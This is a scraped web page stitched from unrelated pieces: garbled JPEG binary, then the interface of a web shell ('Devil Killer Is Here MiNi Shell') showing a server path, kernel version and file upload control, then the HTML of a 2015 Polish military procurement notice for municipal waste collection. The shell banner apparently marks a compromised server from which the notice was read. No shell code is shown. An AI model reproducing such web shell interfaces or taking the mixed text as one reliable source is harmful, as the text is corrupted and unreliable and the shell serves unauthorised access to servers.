JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/180281-N-2015.html

<p class="kh_header"><b>Zgierz: Usługi w zakresie  odbioru i wywozu odpadów komunalnych wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów  administrowanych  przez 31 Wojskowy Oddział Gospodarczy na  2016 rok - numer sprawy 1 ZP 16</b><br>
<b>Numer ogłoszenia: 180281 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 31 Wojskowy Oddział Gospodarczy , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 261 442 098, faks 261 442 101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.31wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie  odbioru i wywozu odpadów komunalnych wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów  administrowanych  przez 31 Wojskowy Oddział Gospodarczy na  2016 rok - numer sprawy 1 ZP 16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi w zakresie odbioru odpadów komunalnych  wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy na rok 2016 - numer sprawy 1/ZP/16 .
niesegregowanych  ( zmieszanych ) odpadów komunalnych 
( kod odpadu 20 03 01 ) 
segregowanych 
Papier i tektura ( kod odpadu 20 01 01) 
Tworzywa sztuczne ( kod odpadu 20 01 39 ) 
Szkło ( kod odpadu 20 01 02 ) 
Metale ( kod odpadu  20 01 40 ) 
Trawa i Liście ( odpady ulegające  biodegradacji  kod odpadu 20 02 01 ) 
2.Szczegółowy opis przedmiotu zamówienia dla zadań nr 1-5  zawierający min.   miejsca odbioru odpadów,  ilości, częstotliwość odbioru   określają specyfikacja techniczna  (załącznik nr 1 do umowy)  oraz formularze cenowe (załączniki nr 1a-1e do SIWZ ) .
Podane  w w/w załącznikach  ilości przedmiotu zamówienia są ilościami prognozowanymi  ( szacunkowymi ) natomiast rozliczne będą faktyczne ilości m3 odebranych nieczystości stałych .
3.Lokalizacja obiektów:
Zadanie nr 1  ( Nowy Glinnik , Tomaszów Mazowiecki )
Zadanie nr 2  ( Leźnica Wielka  )
Zadanie nr 3  ( Łódź , Zgierz , Jeżewo )
Zadanie nr 4  ( Gałkówek , Regny )
Zadanie nr 5  (  Kutno , Skierniewice ).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 10 % wartości zamówienia podstawowego dla wszystkich zadań .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość oraz formy wniesienia wadium zostały określone w rozdziale X SIWZ .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają następujące warunki:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania:
a)aktualnego na dzień składania ofert zezwolenia na prowadzenie działalności w zakresie odbioru odpadów komunalnych  na terenie gminy  właściwej dla miejsca wykonywania usługi  zgodnie z ustawą z dnia  28 listopada 2014r. o utrzymaniu porządku i czystości w gminach ( Dz.U. z 2015 poz. 87 )
b) aktualnego na dzień składania  ofert zezwolenia na prowadzenie działalności   w zakresie transportu odpadów komunalnych wydane przez starostę właściwego ze względu na miejsce transportującego odpady zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (Dz.U. z 2013r. poz. 21 z późn. zm.)
c)złożonego przez Wykonawcę stosownego  oświadczenia  w trybie  art. 22 ust. 1 pkt. 1  ustawy Pzp - tj. wg załącznika  nr 3 do SIWZ. 
d)sprawozdania podmiotu odbierającego odpady komunalne od właścicieli nieruchomości za I półrocze 2015 roku  wg wzoru określonego w rozporządzeniu Ministra Środowiska z dnia  29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami następujących frakcji odpadów komunalnych    ( Dz.U. z 2012 r., poz. 645 ) składanego do wójta , burmistrza lub prezydenta miasta , właściwego ze względu na wpis do działalności regulowanej  - kopia poświadczona za zgodność z oryginałem .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada  doświadczenie zdobyte poprzez wykonanie lub wykonywanie  w okresie ostatnich     3 lat (a jeżeli okres działalności jest krótszy w tym okresie), przed upływem terminu składania  ofert  co najmniej jednej lub kilku usług (umów) odpowiadających przedmiotowi niniejszego zamówienia, tj. usłudze odbioru i wywozu odpadów komunalnych  o wartości nie mniejszej niż: 
Dla zadania nr 1 -  40.000,00 zł. brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dowodów/dokumentów potwierdzających, że usługi zostały wykonane należycie  ( załącznik nr 6 do SIWZ)
Dla zadania nr 2  - 40.000,00 zł. brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dowodów/dokumentów potwierdzających, że usługi zostały wykonane należycie( załącznik nr 6 do SIWZ)
Dla zadania nr 3  - 40.000,00 zł. brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dowodów/dokumentów potwierdzających, że usługi zostały wykonane należycie ( załącznik nr 6 do SIWZ)
Dla zadania nr 4  - 10.000,00 zł. brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dowodów/dokumentów potwierdzających, że usługi zostały wykonane należycie ( załącznik nr 6 do SIWZ)
Dla zadania nr 5  - 10.000,00 zł. brutto z podaniem ich rodzaju i wartości, daty i miejsca wykonywania oraz załączeniem dowodów/dokumentów potwierdzających, że usługi zostały wykonane należycie ( załącznik nr 6 do SIWZ)
UWAGA: W przypadku złożenia oferty na kilka zadań, Wykonawca zobowiązany jest załączyć wykaz jednej lub kilku usług  (umów), przy czym wartość każdej nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia Wykonawca oferuje. 
PRZYKŁAD: Jeżeli Wykonawca zaoferuje realizację zamówienia w zakresie zadania    nr 1  i  nr 2 wówczas musi wykazać należyte wykonanie co najmniej jednej lub kilku tożsamych co przedmiot zamówienia usług  (umów) polegających na usłudze odbioru  i wywozu odpadów komunalnych o  łącznej wartości brutto nie mniejszej niż 80.000,00 złotych ( 40.000,00 + 40.000,00). 
PRZYKŁAD: Jeżeli  Wykonawca zaoferuje realizację zamówienia w zakresie wszystkich zadań tj.nr 1 - 5  Zamawiający żąda wykazu jednej lub kilku tożsamych co przedmiot  zamówienia usług (umów) polegających na usłudze odbioru i wywozu odpadów  komunalnych  o  łącznej wartości  brutto nie mniejszej niż 140.000,00 złotych   
Dowodami są:
a)poświadczenie wystawione przez podmiot na rzecz, którego dostawa była wykonywana,
b)oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a).
W przypadku, gdy Zamawiający (JW 2573 / 31 WOG) jest podmiotem, na rzecz którego dostawa wskazana w wykazie została wcześniej wykonana, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie  art. 22 ust.1 pkt. 3 ustawy Pzp. wg załącznika  nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia w trybie  art. 22 ust.1 pkt. 3 ustawy Pzp. wg załącznika  nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada ważną na dzień składania ofert  opłaconą polisę  potwierdzającą , że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia , w wysokości minimum:
dla  zadania nr 1 -  40.000,00  złotych 
dla  zadania nr 2 -  40.000,00  złotych 
dla  zadania nr 3 -  40.000,00  złotych 
dla  zadania nr 4 -  10.000,00  złotych 
dla  zadania nr 5 -  10.000,00  złotych 
PRZYKŁAD : W przypadku składania oferty na zadania nr 1 i zadanie nr 2  Wykonawca wykaże,iż posiada ważną na dzień składania ofert  opłaconą polisę OC potwierdzającą, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej      w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą  niż 80.000,00 złotych ( 40.000,00 + 40.000,00 ) 
PRZYKŁAD : W przypadku składania oferty na  wszystkie zadania  tj. nr 1-5 Wykonawca wykaże, iż posiada ważną na dzień składania ofert opłaconą polisę OC potwierdzającą, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej      w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą  niż 140.000,00 złotych.
Warunek oceniony zostanie na podstawie złożonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Poziom recyklingu - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umownych wymaga formy pisemnej uzgodnionej przez strony pod rygorem ich nieważności i jest dopuszczalna jedynie w sytuacjach określonych w art. 144 Ustawy Prawo zamówień publicznych. 
Zamawiający dopuszcza zmiany umowy w następujących sytuacjach:
1)Zmiany lokalizacji pojemników, częstotliwości wywozu odpadów, pojemności oraz ilości pojemników;
2)Zmiany siedziby lub nazwy firmy Wykonawcy/Zamawiającego
3)Zmiany strukturalne (przekazanie kompleksu poza resort obrony narodowej), których nie można było przewidzieć w chwili zawarcia - zmniejszenie zakresu usług.
4)Wyłączenie jednego kompleksu, a włączenie drugiego, o ile nie ma to wpływu na wartość umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.31wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 31 WOG 95-100 Zgierz ul. Konstantynowska 85 budynek nr 3 pokój nr 3 pon.- pt. 7.30-15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 10:00, miejsce: 31 WOG 95-100 ZGIERZ, UL.KONSTANTYNOWSKA 85 BUDYNEK NR 2, I PIĘTRO, POMIESZCZENIE NR 114 (KANCELARIA JAWNA)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 ( Tomaszów Mazowiecki , Nowy Glinnik ) Usługi w zakresie odbioru odpadów komunalnych  wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy na rok 2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 1 zawierający min. miejsca odbioru odpadów,  ilości, częstotliwość odbioru  określa specyfikacja techniczna       ( załącznik nr 1 do umowy ) oraz formularz cenowy  ( załącznik nr 1a do SIWZ ) .
Podane  w w/w załącznikach  ilości przedmiotu zamówienia są ilościami prognozowanymi  ( szacunkowymi ) natomiast rozliczne będą faktyczne ilości m3 odebranych nieczystości stałych .
Lokalizacja obiektów
Zadanie nr 1  ( Tomaszów Mazowiecki , Nowy Glinnik ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Poziom recyklingu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 ( Leźnica Wielka ) Usługi w zakresie odbioru odpadów komunalnych  wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy na rok 2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 2 zawierający min. miejsca odbioru odpadów,  ilości, częstotliwość odbioru  określa specyfikacja techniczna       ( załącznik nr 1 do umowy ) oraz formularz cenowy ( załącznik nr 1b do SIWZ ) .
Podane  w w/w załącznikach  ilości przedmiotu zamówienia są ilościami prognozowanymi  ( szacunkowymi ) natomiast rozliczne będą faktyczne ilości m3 odebranych nieczystości stałych .
Lokalizacja obiektu
Zadanie nr 2  ( Leźnica Wielka ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Poziom recyklingu - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 ( Łódź , Zgierz , Jeżewo) Usługi w zakresie odbioru odpadów komunalnych  wraz z ich późniejszym unieszkodliwieniem  lub wykorzystaniem  z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy na rok 2016.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia dla zadania nr 3 zawierający min. miejsca odbioru odpadów,  ilości, częstotliwość odbioru  określa specyfikacja techniczna       ( załącznik nr 1 do umowy ) oraz formularz cenowy  ( załącznik nr 1c do SIWZ ) .
Podane  w w/w załącznikach  ilości przedmiotu zamówienia są ilościami prognozowanymi  ( szacunkowymi ) natomiast rozliczne będą faktyczne ilości m3 odebranych nieczystości stałych .
Lokalizacja obiektów
Zadanie nr 3  ( Łódź , Zgierz , Jeżewo ).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
